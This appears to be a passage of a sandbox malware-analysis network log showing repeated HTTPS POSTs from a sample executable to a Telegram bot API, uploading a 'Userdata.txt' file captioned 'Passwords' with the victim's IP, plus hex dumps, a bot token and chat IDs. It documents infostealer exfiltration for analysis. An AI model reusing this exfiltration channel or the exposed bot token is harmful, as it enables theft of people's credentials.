                                                                                                          2025-01-10 22:12:32 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 31 37 65 33 34 65 36 37 33 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3317e34e673aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:32 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:32 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:32 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44804,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547152,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          23192.168.2.950018149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:34 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd332a5d9f9c69
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 22:12:34 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 32 61 35 64 39 66 39 63 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd332a5d9f9c69Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:34 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:34 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:34 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44805,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547154,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          24192.168.2.950020149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:35 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd333ccb7fd9d3
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:35 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 33 63 63 62 37 66 64 39 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd333ccb7fd9d3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:35 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:35 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:35 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 35 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44806,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547155,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          25192.168.2.950022149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:37 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3351cb172d67
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:37 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 35 31 63 62 31 37 32 64 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3351cb172d67Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:37 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:37 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:37 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 35 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44807,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547157,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          26192.168.2.950024149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:38 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd336809ef4d50
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:38 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 36 38 30 39 65 66 34 64 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd336809ef4d50Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:39 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:38 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:39 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44808,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547158,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          27192.168.2.950026149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:40 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd337ceb19b4f4
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:40 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 37 63 65 62 31 39 62 34 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd337ceb19b4f4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:40 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:40 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:40 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44809,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547160,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          28192.168.2.950028149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:42 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3395a3db7cbe
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:42 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 39 35 61 33 64 62 37 63 62 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3395a3db7cbeContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:42 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:42 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:42 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44810,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547162,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          29192.168.2.950030149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:43 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd33abb28677f1
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
